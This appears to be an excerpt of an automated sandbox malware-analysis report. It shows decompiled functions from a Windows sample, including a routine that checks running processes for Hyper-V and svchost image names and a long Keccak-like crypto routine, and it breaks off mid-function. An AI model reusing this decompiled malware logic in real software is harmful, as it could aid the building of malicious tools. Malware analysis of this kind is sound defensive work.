            • FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: 9e130ce7da975b15dbb848dfe90eca01289d751942e7cb4d0672777e2307de5a
            • Instruction ID: c05982c235d295c68c0f87cb75da938a78a456b0023f73bafdaccfc67cf3cabf
            • Opcode Fuzzy Hash: 9e130ce7da975b15dbb848dfe90eca01289d751942e7cb4d0672777e2307de5a
            • Instruction Fuzzy Hash: 21B0923000960CEBCB011F45FE08BE93FACEB00B95F588020BA0C04572C776A9A0EA88
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B4928, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B4928(void* _a4) {
				int _t2;

				_t2 = HeapDestroy(_a4); // executed
				return _t2;
			}




            0x009b492e
            0x009b4935

            APIs
            • HeapDestroy.KERNELBASE(00000000,?,009B752F,00000000,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B492E
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: DestroyHeap
            • String ID:
            • API String ID: 2435110975-0
            • Opcode ID: 339396a9fd249ce9655d5484b1fc452fd79912b58b031ce39caac8dd46deaa09
            • Instruction ID: 105690a6ad1e75eb9860f033ee5661234397b0b33c60df4140c06191f5f8c9c7
            • Opcode Fuzzy Hash: 339396a9fd249ce9655d5484b1fc452fd79912b58b031ce39caac8dd46deaa09
            • Instruction Fuzzy Hash: 21A0113000820CAB8B022B82EC088883F2CEA022A0B088020FA0C000228B22A820AA88
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B4C87, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B4C87(int _a4) {

				ExitProcess(_a4);
			}



            0x009b4c8d

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: 66b396719214fba858b3d6518965f6f4b3f6079d4af169a3cf87f38133c02cd9
            • Instruction ID: 67345b893b8fbbe1295ff45b84ace54e915f5ce0d89b83c70d6f168aee7d1803
            • Opcode Fuzzy Hash: 66b396719214fba858b3d6518965f6f4b3f6079d4af169a3cf87f38133c02cd9
            • Instruction Fuzzy Hash: F5A0023041824CBBCB016F66DC19C597F6DFB02691F404021F90D45232DB72A9E5AAD9
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 009B4B05, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 73COMMON
            Download Yara Rule
            C-Code - Quality: 36%
            			E009B4B05(long _a4) {
				char _v8;
				WCHAR* _t4;
				void* _t6;
				signed int _t15;
				void* _t31;

				_t4 =  *0x9c1ddc; // 0x0
				_v8 = 0x800;
				_push(0x800);
				if(_t4 != 0) {
					_push(0);
					_push(_t4);
					E009B49D3();
				} else {
					 *0x9c1ddc = E009B494C();
				}
				_t6 = OpenProcess(0x1000, 0, _a4);
				_t31 = _t6;
				if(_t31 != 0) {
					 *0x9c1300(_t31, 0,  *0x9c1ddc,  &_v8);
					E009B4BEE(_t31);
					_t33 = PathFindFileNameW( *0x9c1ddc);
					if(E009B6197(_t10, L"vmcompute.exe") != 0) {
						if(E009B6197(_t33, L"vmms.exe") == 0 || E009B6197(_t33, L"vmwp.exe") == 0) {
							goto L5;
						} else {
							_t15 = E009B6197(_t33, L"svchost.exe");
							asm("sbb eax, eax");
							_t6 =  ~_t15 + 1;
						}
					} else {
						L5:
						_t6 = 1;
					}
				}
				return _t6;
			}








            0x009b4b09
            0x009b4b13
            0x009b4b16
            0x009b4b19
            0x009b4b28
            0x009b4b2a
            0x009b4b2b
            0x009b4b1b
            0x009b4b21
            0x009b4b21
            0x009b4b3e
            0x009b4b44
            0x009b4b48
            0x009b4b57
            0x009b4b5e
            0x009b4b70
            0x009b4b81
            0x009b4b97
            0x00000000
            0x009b4baa
            0x009b4bb0
            0x009b4bb8
            0x009b4bbb
            0x009b4bbb
            0x009b4b83
            0x009b4b83
            0x009b4b85
            0x009b4b85
            0x009b4b81
            0x009b4bc0

            APIs
            • OpenProcess.KERNEL32(00001000,00000000,009B5BB7,?,?,009B5BB7,?), ref: 009B4B3E
            • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?,009B5BB7,?), ref: 009B4B57
            • PathFindFileNameW.SHLWAPI(?,009B5BB7,?), ref: 009B4B6A
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Process$HeapName$CreateFileFindFullImageOpenPathQuery
            • String ID: svchost.exe$vmcompute.exe$vmms.exe$vmwp.exe
            • API String ID: 2112901129-1116827676
            • Opcode ID: b9d6b234eb04be65f6a769d6934588ec544141307803cfbfbd3b564a53a0ff55
            • Instruction ID: 48c0c2e7552b900f4d6c9d9d45125312e52a6fe9a25bc89c195f543fe3df14c6
            • Opcode Fuzzy Hash: b9d6b234eb04be65f6a769d6934588ec544141307803cfbfbd3b564a53a0ff55
            • Instruction Fuzzy Hash: 1A11E77A95D2217AE7146768FE06FDF3B9CCF47770F10002AFA01D11D3EA64E90165A9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5D2F, Relevance: 3.0, APIs: 2, Instructions: 49encryptionCOMMON
            Download Yara Rule
            APIs
            • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 009B5D48
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 009B5D6F
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: BinaryCryptHeapString$CreateProcess
            • String ID:
            • API String ID: 869147093-0
            • Opcode ID: 60779406ad82f4998c03c8b09e26fbed1906166a8e1a349bf9b734b3c8d40177
            • Instruction ID: 333988408a4a5a31eddba5ebb5b64d065a5b67a948fb643cceabf55d274f4184
            • Opcode Fuzzy Hash: 60779406ad82f4998c03c8b09e26fbed1906166a8e1a349bf9b734b3c8d40177
            • Instruction Fuzzy Hash: B5F0AFB520121DBFEB105F55DC84EEB7B6CEF447B4B018226F908DA291C731CD0086A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5D90, Relevance: 3.0, APIs: 2, Instructions: 44encryptionCOMMON
            Download Yara Rule
            APIs
            • CryptBinaryToStringW.CRYPT32(00000000,00000000,40000000,00000000,009B18EE), ref: 009B5DB1
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • CryptBinaryToStringW.CRYPT32(00000000,00000000,40000000,00000000,009B18EE), ref: 009B5DDA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: BinaryCryptHeapString$CreateProcess
            • String ID:
            • API String ID: 869147093-0
            • Opcode ID: 74b8658e93baa45037706746a07b5f15075a1a1a2a543673172ddc0473c5aec0
            • Instruction ID: cb310e9a268bbc68280d754925c8e260691ecefa419b32629e22fe711355581f
            • Opcode Fuzzy Hash: 74b8658e93baa45037706746a07b5f15075a1a1a2a543673172ddc0473c5aec0
            • Instruction Fuzzy Hash: 41F03C326042596FDF119E65DC08FEB3BADEF81AA0B054125F909C7151E630C91197A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009BAB0D, Relevance: 1.0, Instructions: 995COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 100%
            			E009BAB0D(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int* _v44;
				signed int _t706;
				signed int _t722;
				signed int _t736;
				signed int _t768;
				signed int* _t836;
				signed int* _t863;
				signed int* _t890;
				signed int* _t917;
				signed int* _t944;
				signed int _t969;
				signed int* _t985;
				unsigned int _t986;
				signed int _t988;
				signed int* _t989;
				signed int _t990;
				signed int _t991;
				signed int _t993;
				signed int _t995;
				signed int _t997;
				signed int _t999;
				signed int _t1001;
				signed int _t1003;
				signed int _t1005;
				signed int _t1007;
				signed int _t1009;
				signed int _t1011;
				signed int _t1013;
				signed int* _t1016;
				signed int* _t1018;
				signed int* _t1020;
				signed int* _t1022;
				signed int* _t1024;
				signed int _t1034;
				signed int* _t1050;
				unsigned int _t1051;
				signed int* _t1066;
				signed int _t1067;
				signed int* _t1084;
				signed int* _t1099;
				unsigned int _t1100;
				signed int* _t1116;
				signed int _t1189;
				signed int _t1211;
				signed int _t1233;
				signed int _t1255;
				signed int _t1277;
				signed int* _t1299;
				signed int* _t1300;
				signed int _t1312;
				signed int _t1316;
				signed int _t1319;
				signed int _t1323;
				signed int _t1327;
				signed int _t1330;
				signed int _t1332;
				signed int* _t1334;
				signed int _t1335;
				signed int* _t1337;
				signed int _t1338;
				signed int* _t1340;
				signed int _t1341;
				signed int* _t1343;
				signed int _t1344;
				signed int* _t1346;
				signed int _t1347;
				signed int* _t1349;
				signed int _t1350;
				signed int* _t1352;
				signed int _t1353;
				signed int* _t1355;
				unsigned int _t1356;
				signed int* _t1358;
				unsigned int _t1359;
				signed int _t1361;
				signed int* _t1363;
				unsigned int _t1364;
				signed int _t1366;
				signed int* _t1367;
				signed int _t1368;
				signed int* _t1369;
				signed int _t1370;
				signed int* _t1371;
				signed int _t1372;
				signed int* _t1373;
				signed int _t1374;
				signed int* _t1375;
				signed int _t1380;
				signed int* _t1382;
				unsigned int _t1383;
				signed int _t1385;
				signed int _t1387;
				signed int _t1389;
				signed int _t1391;
				signed int _t1393;
				signed int _t1395;
				signed int _t1397;
				signed int _t1399;
				signed int _t1401;
				signed int* _t1403;
				signed int _t1404;
				intOrPtr* _t1406;
				signed int _t1407;
				signed int* _t1408;
				signed int _t1409;
				signed int* _t1410;
				signed int _t1411;
				signed int* _t1412;
				signed int _t1413;
				signed int* _t1414;
				signed int _t1415;
				signed int* _t1416;
				signed int _t1419;
				signed int _t1424;
				signed int _t1428;
				signed int _t1433;
				signed int _t1438;
				signed int _t1441;
				signed int* _t1443;
				signed int _t1444;
				signed int* _t1446;
				signed int _t1447;
				signed int* _t1449;
				signed int _t1450;
				signed int* _t1452;
				signed int _t1453;
				signed int* _t1455;
				signed int _t1456;
				signed int* _t1458;
				signed int _t1459;
				signed int* _t1461;
				signed int _t1462;
				signed int* _t1464;
				signed int _t1465;
				signed int* _t1467;
				signed int _t1468;
				signed int _t1470;
				signed int _t1472;
				signed int _t1474;
				signed int _t1475;
				signed int _t1476;
				signed int _t1477;
				signed int _t1478;

				_t1416 = _a4;
				_v44 = 0x9bfb00;
				do {
					_t3 =  &(_t1416[4]); // 0xff348d8d
					_t4 =  &(_t1416[0xe]); // 0x1174ff85
					_t5 =  &(_t1416[0x18]); // 0x5fffc883
					_t6 =  &(_t1416[0x22]); // 0x88
					_t7 =  &(_t1416[0x2c]); // 0xa48e
					_t8 =  &(_t1416[0xa]); // 0x3e
					_t9 =  &(_t1416[0x14]); // 0xffff34bd
					_t10 =  &(_t1416[0x1e]); // 0x9bfb00d8
					_t11 =  &(_t1416[0x28]); // 0x8b000000
					_t12 =  &(_t1416[1]); // 0x3b590845
					_t13 =  &(_t1416[0xb]); // 0x308458b
					_t14 =  &(_t1416[0x15]); // 0xc8b9ff
					_t15 =  &(_t1416[0x1f]); // 0x105e8b00
					_t16 =  &(_t1416[0x29]); // 0x4e33044e
					_t17 =  &(_t1416[5]); // 0x5051ffff
					_t18 =  &(_t1416[0xf]); // 0x34958d57
					_t19 =  &(_t1416[0x19]); // 0xe58b5b5e
					_t20 =  &(_t1416[0x23]); // 0xb09e33
					_t21 =  &(_t1416[0x2d]); // 0x14568b00
					_t22 =  &(_t1416[8]); // 0xff34858d
					_t23 =  &(_t1416[0x12]); // 0xc483ffff
					_t24 =  &(_t1416[0x1c]); // 0x758b5653
					_t25 =  &(_t1416[0x26]); // 0x46335046
					_t26 =  &(_t1416[0x30]); // 0x8c
					_t1380 =  *_t22 ^  *_t23 ^  *_t24 ^  *_t25 ^  *_t26;
					_v12 =  *_t3 ^  *_t4 ^  *_t5 ^  *_t6 ^  *_t7;
					_t28 =  &(_t1416[6]); // 0xff9eeee8
					_t29 =  &(_t1416[0x10]); // 0x52ffffff
					_t30 =  &(_t1416[0x1a]); // 0x8b55c35d
					_t31 =  &(_t1416[0x24]); // 0x68b0000
					_t32 =  &(_t1416[0x2e]); // 0x333c5633
					_v20 =  *_t1416 ^  *_t8 ^  *_t9 ^  *_t10 ^  *_t11;
					_t34 =  &(_t1416[2]); // 0x852d72fe
					_t35 =  &(_t1416[0xc]); // 0x89fe2bc6
					_t36 =  &(_t1416[0x16]); // 0xaaf30000
					_t37 =  &(_t1416[0x20]); // 0x33385e33
					_t38 =  &(_t1416[0x2a]); // 0x544e332c
					_t706 =  *_t34 ^  *_t35 ^  *_t36 ^  *_t37 ^  *_t38;
					_v16 =  *_t12 ^  *_t13 ^  *_t14 ^  *_t15 ^  *_t16;
					_t40 =  &(_t1416[3]); // 0x561174f6
					_t41 =  &(_t1416[0xd]); // 0xceeb0845
					_t42 =  &(_t1416[0x17]); // 0x3ebc033
					_t43 =  &(_t1416[0x21]); // 0x9e33605e
					_t44 =  &(_t1416[0x2b]); // 0x337c4e33
					_t1034 =  *_t40 ^  *_t41 ^  *_t42 ^  *_t43 ^  *_t44;
					_v40 =  *_t17 ^  *_t18 ^  *_t19 ^  *_t20 ^  *_t21;
					_t46 =  &(_t1416[7]); // 0xcc483ff
					_t47 =  &(_t1416[0x11]); // 0x9ec1e850
					_t48 =  &(_t1416[0x1b]); // 0x28ec83ec
					_t49 =  &(_t1416[0x25]); // 0x33284633
					_t50 =  &(_t1416[0x2f]); // 0x96336456
					_v32 =  *_t28 ^  *_t29 ^  *_t30 ^  *_t31 ^  *_t32;
					_t52 =  &(_t1416[9]); // 0xe850ffff
					_t53 =  &(_t1416[0x13]); // 0x8dc0320c
					_t54 =  &(_t1416[0x1d]); // 0x45c75708
					_t55 =  &(_t1416[0x27]); // 0xa0863378
					_t56 =  &(_t1416[0x31]); // 0xb49633
					_v24 = _t706;
					_v28 = _t1034;
					_v36 =  *_t46 ^  *_t47 ^  *_t48 ^  *_t49 ^  *_t50;
					_t1419 = _t1034 >> 0x0000001f | _t706 + _t706;
					_v8 =  *_t52 ^  *_t53 ^  *_t54 ^  *_t55 ^  *_t56;
					_t985 = _a4;
					_t1312 = (_t1034 << 0x00000020 | _t706) << 1;
					_t67 =  &(_t985[1]); // 0x3b590845
					 *_t985 = _t1419 ^  *_a4 ^ _t1380;
					_t985[1] = _t1312 ^  *_t67 ^ _v8;
					_t985[0xa] = _t985[0xa] ^ _t1419 ^ _t1380;
					_t985[0xb] = _t985[0xb] ^ _t1312 ^ _v8;
					_t75 =  &(_t985[0x14]); // 0xffff34bd
					_t76 =  &(_t985[0x15]); // 0xc8b9ff
					_t985[0x14] = _t1419 ^  *_t75 ^ _t1380;
					_t985[0x15] = _t1312 ^  *_t76 ^ _v8;
					_t80 =  &(_t985[0x1e]); // 0x9bfb00d8
					_t81 =  &(_t985[0x1f]); // 0x105e8b00
					_t985[0x1e] = _t1419 ^  *_t80 ^ _t1380;
					_t1050 = _t985;
					_t1050[0x1f] = _t1312 ^  *_t81 ^ _v8;
					_t85 =  &(_t1050[0x28]); // 0x8b000000
					_t86 =  &(_t1050[0x29]); // 0x4e33044e
					_t1050[0x28] = _t1419 ^  *_t85 ^ _t1380;
					_t1050[0x29] = _t1312 ^  *_t86 ^ _v8;
					_t1051 = _v40;
					_t722 = _v12;
					_t1316 = (_t1051 << 0x00000020 | _t722) << 1;
					_t1424 = _t1051 >> 0x0000001f | _t722 + _t722;
					_t96 =  &(_t985[2]); // 0x852d72fe
					_t97 =  &(_t985[3]); // 0x561174f6
					_t985[2] = _t1424 ^  *_t96 ^ _v20;
					_t985[3] = _t1316 ^  *_t97 ^ _v16;
					_t102 =  &(_t985[0xc]); // 0x89fe2bc6
					_t103 =  &(_t985[0xd]); // 0xceeb0845
					_t985[0xc] = _t1424 ^  *_t102 ^ _v20;
					_t985[0xd] = _t1316 ^  *_t103 ^ _v16;
					_t985[0x16] = _t985[0x16] ^ _t1424 ^ _v20;
					_t985[0x17] = _t985[0x17] ^ _t1316 ^ _v16;
					_t985[0x20] = _t985[0x20] ^ _t1424 ^ _v20;
					_t1066 = _t985;
					_t1066[0x21] = _t1066[0x21] ^ _t1316 ^ _v16;
					_t1066[0x2a] = _t1066[0x2a] ^ _t1424 ^ _v20;
					_t1066[0x2b] = _t1066[0x2b] ^ _t1316 ^ _v16;
					_t1067 = _v36;
					_t736 = _v32;
					_t1428 = _t1067 >> 0x0000001f | _t736 + _t736;
					_t1319 = (_t1067 << 0x00000020 | _t736) << 1;
					_t132 =  &(_t985[4]); // 0xff348d8d
					_t133 =  &(_t985[5]); // 0x5051ffff
					_t985[4] = _t1428 ^  *_t132 ^ _v24;
					_t985[5] = _t1319 ^  *_t133 ^ _v28;
					_t138 =  &(_t985[0xe]); // 0x1174ff85
					_t139 =  &(_t985[0xf]); // 0x34958d57
					_t985[0xe] = _t1428 ^  *_t138 ^ _v24;
					_t985[0xf] = _t1319 ^  *_t139 ^ _v28;
					_t144 =  &(_t985[0x18]); // 0x5fffc883
					_t145 =  &(_t985[0x19]); // 0xe58b5b5e
					_t985[0x18] = _t1428 ^  *_t144 ^ _v24;
					_t985[0x19] = _t1319 ^  *_t145 ^ _v28;
					_t150 =  &(_t985[0x22]); // 0x88
					_t151 =  &(_t985[0x23]); // 0xb09e33
					_t985[0x22] = _t1428 ^  *_t150 ^ _v24;
					_t1084 = _t985;
					_t986 = _v8;
					_t1084[0x23] = _t1319 ^  *_t151 ^ _v28;
					_t157 =  &(_t1084[0x2c]); // 0xa48e
					_t158 =  &(_t1084[0x2d]); // 0x14568b00
					_t1084[0x2c] = _t1428 ^  *_t157 ^ _v24;
					_t1084[0x2d] = _t1319 ^  *_t158 ^ _v28;
					_t1323 = (_t986 << 0x00000020 | _t1380) << 1;
					_t988 = _v40;
					_t1433 = _t986 >> 0x0000001f | _t1380 + _t1380;
					_t1382 = _a4;
					 *(_t1382 + 0x18) =  *(_t1382 + 0x18) ^ _t1433 ^ _v12;
					 *(_t1382 + 0x1c) =  *(_t1382 + 0x1c) ^ _t1323 ^ _t988;
					_t174 = _t1382 + 0x40; // 0x52ffffff
					_t176 = _t1382 + 0x44; // 0x9ec1e850
					 *(_t1382 + 0x40) = _t1433 ^  *_t174 ^ _v12;
					 *(_t1382 + 0x44) = _t1323 ^  *_t176 ^ _t988;
					_t179 = _t1382 + 0x68; // 0x8b55c35d
					_t180 = _t1382 + 0x6c; // 0x28ec83ec
					 *(_t1382 + 0x68) = _t1433 ^  *_t179 ^ _v12;
					 *(_t1382 + 0x6c) = _t1323 ^  *_t180 ^ _t988;
					_t184 = _t1382 + 0x90; // 0x68b0000
					_t185 = _t1382 + 0x94; // 0x33284633
					 *(_t1382 + 0x90) = _t1433 ^  *_t184 ^ _v12;
					_t1099 = _t1382;
					 *(_t1099 + 0x94) = _t1323 ^  *_t185 ^ _t988;
					_t189 = _t1099 + 0xb8; // 0x333c5633
					_t190 = _t1099 + 0xbc; // 0x96336456
					 *(_t1099 + 0xb8) = _t1433 ^  *_t189 ^ _v12;
					_t989 = _t1382;
					 *(_t1099 + 0xbc) = _t1323 ^  *_t190 ^ _t988;
					_t1100 = _v16;
					_t768 = _v20;
					_t1327 = (_t1100 << 0x00000020 | _t768) << 1;
					_t1438 = _t1100 >> 0x0000001f | _t768 + _t768;
					_t200 = _t989 + 0x24; // 0xe850ffff
					_t201 = _t989 + 0x20; // 0xff34858d
					 *(_t989 + 0x20) = _t1438 ^  *_t201 ^ _v32;
					_t990 = _v36;
					 *(_t989 + 0x24) = _t1327 ^  *_t200 ^ _v36;
					 *(_t1382 + 0x48) =  *(_t1382 + 0x48) ^ _t1438 ^ _v32;
					 *(_t1382 + 0x4c) =  *(_t1382 + 0x4c) ^ _t1327 ^ _t990;
					_t212 = _t1382 + 0x70; // 0x758b5653
					_t213 = _t1382 + 0x74; // 0x45c75708
					 *(_t1382 + 0x70) = _t1438 ^  *_t212 ^ _v32;
					 *(_t1382 + 0x74) = _t1327 ^  *_t213 ^ _t990;
					_t217 = _t1382 + 0x98; // 0x46335046
					_t219 = _t1382 + 0x9c; // 0xa0863378
					 *(_t1382 + 0x98) = _t1438 ^  *_t217 ^ _v32;
					_t1116 = _t1382;
					 *(_t1116 + 0x9c) = _t1327 ^  *_t219 ^ _t990;
					_t222 = _t1116 + 0xc0; // 0x8c
					_t223 = _t1116 + 0xc4; // 0xb49633
					 *(_t1116 + 0xc0) = _t1438 ^  *_t222 ^ _v32;
					 *(_t1116 + 0xc4) = _t1327 ^  *_t223 ^ _t990;
					_t227 = _t1116 + 8; // 0x852d72fe
					_t1441 =  *_t227;
					_t228 = _t1116 + 0xc; // 0x561174f6
					_t1330 =  *_t228;
					_t229 = _t1116 + 0x50; // 0xffff34bd
					_t991 =  *_t229;
					_t230 = _t1116 + 0x54; // 0xc8b9ff
					_t1383 =  *_t230;
					_t1443 = _a4;
					 *(_t1443 + 0x50) = _t1330 >> 0x0000001f | _t1441 + _t1441;
					 *(_t1443 + 0x54) = (_t1330 << 0x00000020 | _t1441) << 1;
					_t238 = _t1443 + 0x38; // 0x1174ff85
					_t239 = _t1443 + 0x3c; // 0x34958d57
					_t1332 =  *_t239;
					_v40 =  *_t238;
					 *(_t1443 + 0x3c) = (_t1383 << 0x00000020 | _t991) << 3;
					 *(_t1443 + 0x38) = _t1383 >> 0x0000001d | _t991 << 0x00000003;
					_t247 = _t1443 + 0x58; // 0xaaf30000
					_t1385 =  *_t247;
					_t248 = _t1443 + 0x5c; // 0x3ebc033
					_t1444 =  *_t248;
					_t993 = _v40;
					_t1334 = _a4;
					 *(_t1334 + 0x58) = _t1332 >> 0x0000001a | _t993 << 0x00000006;
					 *(_t1334 + 0x5c) = (_t1332 << 0x00000020 | _t993) << 6;
					_t257 = _t1334 + 0x88; // 0x88
					_t995 =  *_t257;
					_t258 = _t1334 + 0x8c; // 0xb09e33
					_t1335 =  *_t258;
					_t1446 = _a4;
					 *(_t1446 + 0x88) = _t1444 >> 0x00000016 | _t1385 << 0x0000000a;
					 *(_t1446 + 0x8c) = (_t1444 << 0x00000020 | _t1385) << 0xa;
					_t266 = _t1446 + 0x90; // 0x68b0000
					_t1387 =  *_t266;
					_t267 = _t1446 + 0x94; // 0x33284633
					_t1447 =  *_t267;
					_t1337 = _a4;
					 *(_t1337 + 0x90) = _t1335 >> 0x00000011 | _t995 << 0x0000000f;
					 *(_t1337 + 0x94) = (_t1335 << 0x00000020 | _t995) << 0xf;
					_t275 = _t1337 + 0x18; // 0xff9eeee8
					_t997 =  *_t275;
					_t276 = _t1337 + 0x1c; // 0xcc483ff
					_t1338 =  *_t276;
					_t1449 = _a4;
					 *(_t1449 + 0x18) = _t1447 >> 0x0000000b | _t1387 << 0x00000015;
					 *(_t1449 + 0x1c) = (_t1447 << 0x00000020 | _t1387) << 0x15;
					_t284 = _t1449 + 0x28; // 0x3e
					_t1389 =  *_t284;
					_t285 = _t1449 + 0x2c; // 0x308458b
					_t1450 =  *_t285;
					_t1340 = _a4;
					 *(_t1340 + 0x28) = _t1338 >> 0x00000004 | _t997 << 0x0000001c;
					 *(_t1340 + 0x2c) = (_t1338 << 0x00000020 | _t997) << 0x1c;
					_t293 = _t1340 + 0x80; // 0x33385e33
					_t999 =  *_t293;
					_t294 = _t1340 + 0x84; // 0x9e33605e
					_t1341 =  *_t294;
					_t1452 = _a4;
					 *(_t1452 + 0x84) = _t1389 << 0x00000004 | _t1450 >> 0x0000001c;
					 *(_t1452 + 0x80) = (_t1450 << 0x00000020 | _t1389) >> 0x1c;
					_t302 = _t1452 + 0x40; // 0x52ffffff
					_t1391 =  *_t302;
					_t303 = _t1452 + 0x44; // 0x9ec1e850
					_t1453 =  *_t303;
					_t1343 = _a4;
					 *(_t1343 + 0x44) = _t999 << 0x0000000d | _t1341 >> 0x00000013;
					 *(_t1343 + 0x40) = (_t1341 << 0x00000020 | _t999) >> 0x13;
					_t311 = _t1343 + 0xa8; // 0x544e332c
					_t1001 =  *_t311;
					_t312 = _t1343 + 0xac; // 0x337c4e33
					_t1344 =  *_t312;
					_t1455 = _a4;
					 *(_t1455 + 0xac) = _t1391 << 0x00000017 | _t1453 >> 0x00000009;
					 *(_t1455 + 0xa8) = (_t1453 << 0x00000020 | _t1391) >> 9;
					_t320 = _t1455 + 0xc0; // 0x8c
					_t1393 =  *_t320;
					_t321 = _t1455 + 0xc4; // 0xb49633
					_t1456 =  *_t321;
					_t1346 = _a4;
					 *(_t1346 + 0xc0) = _t1344 >> 0x0000001e | _t1001 << 0x00000002;
					 *(_t1346 + 0xc4) = (_t1344 << 0x00000020 | _t1001) << 2;
					_t329 = _t1346 + 0x20; // 0xff34858d
					_t1003 =  *_t329;
